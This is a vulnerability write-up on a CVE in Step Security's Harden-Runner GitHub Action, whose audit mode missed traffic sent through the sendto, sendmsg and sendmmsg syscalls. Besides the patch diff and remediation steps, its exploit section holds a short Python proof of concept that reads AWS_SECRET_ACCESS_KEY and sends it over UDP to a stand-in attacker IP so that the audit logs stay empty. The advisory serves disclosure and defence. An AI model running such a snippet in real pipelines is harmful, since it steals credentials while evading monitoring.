CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-25598

The Invisible Courier: Bypassing Harden-Runner's Watchful Eye via Syscall Ninja Tactics

Alon Barad
Alon Barad
Software Engineer

Feb 9, 2026·5 min read·44 visits

Executive Summary (TL;DR)

Harden-Runner's audit mode failed to log network traffic sent via `sendto`, `sendmsg`, or `sendmmsg` syscalls. Attackers could bypass audit logs by using connectionless protocols or raw socket messaging, effectively rendering the monitoring invisible for those specific transmission methods.

In the world of CI/CD security, visibility is everything. Step Security's Harden-Runner promises to be the all-seeing eye for GitHub Actions, monitoring outbound traffic to catch malicious dependencies dialing home. However, CVE-2026-25598 reveals a classic blind spot: the agent was obsessed with the polite handshake of the `connect()` syscall but completely ignored the rude interruption of `sendto()`, `sendmsg()`, and `sendmmsg()`. This oversight allowed attackers to exfiltrate sensitive data right under the nose of the `egress-policy: audit` mode without generating a single log entry.

The Hook: The Panopticon That Blinked

Modern CI/CD pipelines are basically terrifying. You are downloading half the internet via npm install or pip install and executing it on a server with access to your production deployment keys. To combat this, Step Security created Harden-Runner, a GitHub Action that acts like an EDR (Endpoint Detection and Response) for your runner. It uses eBPF—the Linux kernel's superpower—to hook into system calls and watch what your build is doing.

The promise is simple: if a malicious package tries to send your AWS secrets to evil-hacker.com, Harden-Runner sees the outbound connection, logs it, and (in strict mode) blocks it. It provides the "Audit" trail that compliance teams drool over.

But here is the catch with eBPF and syscall hooking: you only see what you explicitly look for. If you set up a camera at the front door to catch burglars, but the burglar decides to Kool-Aid Man their way through the wall, your camera sees nothing. CVE-2026-25598 is exactly that—a Kool-Aid Man style bypass of the network auditing logic.

The Flaw: A Tale of Missing Syscalls

To understand this vulnerability, we have to look at how network connections work in Linux. The standard, polite way to talk to a remote server (especially over TCP) is the connect() system call. It initiates the three-way handshake. Most monitoring tools hook connect() because it's the choke point. If you stop the handshake, you stop the data.

However, the Linux kernel offers a buffet of options for sending data. Enter sendto, sendmsg, and sendmmsg. These are often used for UDP (which is connectionless) or for more advanced socket operations where you specify the destination address with the data payload, rather than establishing a connection first.

The flaw in Harden-Runner (prior to v2.14.2) was an assumption: the developers assumed that interesting traffic would always flow through connect(). The eBPF probes were attached to the connect family of syscalls but left the send-message family unmonitored. This meant that if an attacker used sendto() directly, the kernel would happily route the packet out to the internet, and the Harden-Runner agent would remain blissfully unaware, staring blankly at the connect() hook waiting for an event that never happened.

The Code: Swapping the Brain

The fix for this vulnerability didn't involve complex logic changes in the TypeScript action itself. Instead, it was a brain transplant. The Harden-Runner action downloads a compiled binary agent that does the heavy lifting (eBPF instrumentation). The patch simply points the downloader to a smarter version of that agent.

Here is the diff from src/install-agent.ts in commit 5ef0c079ce82195b2a36a210272d6b661572d83e:

// src/install-agent.ts
 
// The vulnerability existed because we were pulling v0.14.2
- downloadPath = await tc.downloadTool("https://github.com/step-security/agent/releases/download/v0.14.2/agent_0.14.2_linux_amd64.tar.gz", ...);
 
// The fix: Upgrade to v0.14.3, which includes the missing syscall hooks
+ downloadPath = await tc.downloadTool("https://github.com/step-security/agent/releases/download/v0.14.3/agent_0.14.3_linux_amd64.tar.gz", ...);

While this looks trivial, the magic happened inside that agent_0.14.3_linux_amd64.tar.gz. The Go/C code inside that binary was updated to attach kprobes (or tracepoints) to:

  1. __sys_sendto
  2. __sys_sendmsg
  3. __sys_sendmmsg

This ensures that even if a process tries to bypass the handshake, the intent to transmit data to an external IP is captured.

The Exploit: Ghost in the Machine

Let's play the role of a malicious dependency. We are inside a GitHub Action runner, and we know the repository owner is using Harden-Runner with egress-policy: audit. They think they are safe because they will see any weird connections in the logs.

If we use curl or standard Python requests, the library will call connect(), and we get caught. So, we drop to low-level sockets. We construct a UDP packet (or even a raw TCP packet using sendto if we are feeling adventurous with raw sockets, though UDP is easier here) and fire it off.

Here is the Proof-of-Concept logic:

import socket
import os
 
# The secret we want to steal
secret_data = os.environ.get("AWS_SECRET_ACCESS_KEY", "test_secret")
 
# TARGET: 198.51.100.1 (Attacker Controller)
# We use SOCK_DGRAM (UDP) which naturally uses sendto()
# effectively bypassing the connect() hook in older agents.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 
print("[+] Exfiltrating data via UDP sendto()...")
# The agent is watching for a handshake. We don't shake hands.
sock.sendto(secret_data.encode(), ("198.51.100.1", 1337))
 
print("[+] Data sent. Check the audit logs. You won't find me.")

When this script runs on a vulnerable version, the packet leaves the network interface. The destination server receives the secrets. The Step Security dashboard? It shows "No outbound connections detected." It is the perfect crime.

The Impact: False Sense of Security

The danger here isn't just that data can be exfiltrated; it's that the record of the exfiltration is missing. Security teams rely on these audit logs to prove a negative: "We checked the logs, and no keys were sent to unknown IPs."

With CVE-2026-25598, that statement becomes a lie. A sophisticated attacker (like those behind SolarWinds or Codecov) knows how to check for EDR agents and bypass them. By exploiting this gap, they could maintain persistence or steal credentials from high-value repositories without tripping a single alarm. This degrades the integrity of the entire supply chain security posture provided by the tool.

The Fix: Closing the Window

Remediation is straightforward but urgent. You must update the action version in your .github/workflows files. The vulnerability is patched in v2.14.2.

steps:
  - uses: step-security/harden-runner@v2.14.2
    with:
      egress-policy: audit

This version pulls the 0.14.3 agent. For a more robust defense, consider switching from audit to block mode. In block mode, the agent often employs DNS filtering and firewall rules that operate at a network layer below the syscall hooks, potentially catching packets even if the specific syscall wasn't audited—though relying on audit accuracy alone requires this patch.

Official Patches

Step SecurityCommit bumping agent version

Fix Analysis (1)

Technical Appendix

CVSS Score
6.3/ 10
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N

Affected Systems

GitHub Actions Runners (Ubuntu)Harden-Runner < 2.14.2

Affected Versions Detail

Product
Affected Versions
Fixed Version
harden-runner
Step Security
< 2.14.22.14.2
AttributeDetail
CWECWE-778
Attack VectorNetwork (AV:N)
CVSS 4.06.3 (Medium)
ImpactAudit Log Integrity / Data Exfiltration
Affected Syscallssendto, sendmsg, sendmmsg
StatusPatched

MITRE ATT&CK Mapping

T1562.001Impair Defenses: Disable or Modify Tools
Defense Evasion
T1048Exfiltration Over Alternative Protocol
Exfiltration
CWE-778
Insufficient Logging

Insufficient Logging

Known Exploits & Detection

SimulatedUDP sendto() bypass of audit logs

Vulnerability Timeline

Patch Committed
2026-02-07
CVE Published
2026-02-09

References & Sources

  • [1]GHSA Advisory
  • [2]Linux Man Page: sendto(2)

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 7 hours ago•CVE-2026-48861
2.1

CVE-2026-48861: HTTP Request Splitting and Smuggling via Method Parameter CRLF Injection in Elixir Mint

CVE-2026-48861 is a client-side HTTP request-line CRLF (Carriage Return Line Feed) injection vulnerability in the popular Elixir HTTP client library, Mint. The vulnerability permits HTTP Request Splitting and HTTP Request Smuggling when an application forwards untrusted, attacker-controlled inputs to Mint's HTTP client requests as either the HTTP request method or target. By embedding CRLF characters within these parameters, an attacker can terminate the request line prematurely, inject malicious headers, or pipeline entirely independent requests. These smuggled requests are then processed by upstream or downstream proxy servers as separate HTTP queries on the same TCP connection. While Mint version 1.7.0 introduced target validation to secure the request target, the HTTP request method parameter remained completely unvalidated. This flaw allows attackers to bypass routing filters, access restricted internal APIs, or poison HTTP caches under default configurations.

Amit Schendel
Amit Schendel
4 views•7 min read
•about 8 hours ago•CVE-2026-49753
6.3

CVE-2026-49753: HTTP Request/Response Smuggling via Inconsistent Content-Length Parsing in Elixir Mint Client

An Inconsistent Interpretation of HTTP Requests (HTTP Request/Response Smuggling) vulnerability in the Elixir Mint HTTP client allows attacker-controlled HTTP/1 servers to desynchronize response framing on shared connections due to over-lenient parsing of sign-prefixed Content-Length headers.

Amit Schendel
Amit Schendel
6 views•6 min read
•about 8 hours ago•CVE-2026-49754
8.2

CVE-2026-49754: Denial of Service via Unbounded HTTP/2 CONTINUATION Frame Accumulation in Elixir Mint

An allocation of resources without limits or throttling vulnerability in Elixir Mint allows an attacker-controlled HTTP/2 server to exhaust memory in a Mint client. The vulnerability is exploited by sending a HEADERS frame without the END_HEADERS flag followed by an infinite stream of CONTINUATION frames. Because the client lacks limits on the incoming header-block accumulator, the client continuously consumes memory until an out-of-memory crash occurs.

Amit Schendel
Amit Schendel
7 views•6 min read
•about 9 hours ago•CVE-2026-48596
2.1

CVE-2026-48596: Improper Neutralization of CRLF Sequences in Elixir Tesla Multipart HTTP Client

CVE-2026-48596 is an Improper Neutralization of CRLF Sequences in HTTP Headers (HTTP Request/Response Splitting, CWE-113) in the Elixir Tesla HTTP client. The flaw resides in how multipart content-type parameters are joined and serialized, enabling attackers to inject arbitrary headers or split HTTP requests when applications pass untrusted inputs to the parameters of multipart uploads.

Alon Barad
Alon Barad
5 views•6 min read
•about 9 hours ago•CVE-2026-48594
8.2

CVE-2026-48594: Decompression Bomb Denial of Service in Elixir Tesla HTTP Client

An improper handling of highly compressed data (decompression bomb) vulnerability exists in the Elixir Tesla HTTP client when utilizing response decompression middlewares. By serving highly compressed responses or stacked content-encoding headers, a malicious server can cause arbitrary heap exhaustion, leading to a denial of service (DoS) crash in the BEAM virtual machine.

Amit Schendel
Amit Schendel
6 views•6 min read
•about 10 hours ago•CVE-2026-48595
8.2

CVE-2026-48595: Cross-Origin Credential Leakage in Elixir Tesla Client via Case-Sensitive Redirect Filter Bypass

A high-severity security vulnerability in Elixir's Tesla HTTP client library (CVE-2026-48595) allows unauthenticated remote attackers to harvest sensitive credentials, including Authorization headers and cookies. The flaw resides in the 'Tesla.Middleware.FollowRedirects' component, which performs case-sensitive lookups when stripping credentials during cross-origin redirects. Because HTTP headers are case-insensitive by RFC specifications, standard canonical casing (e.g., 'Authorization') bypasses the lowercase-only blocklist, leaking tokens to untrusted external redirect destinations.

Alon Barad
Alon Barad
6 views•5 min read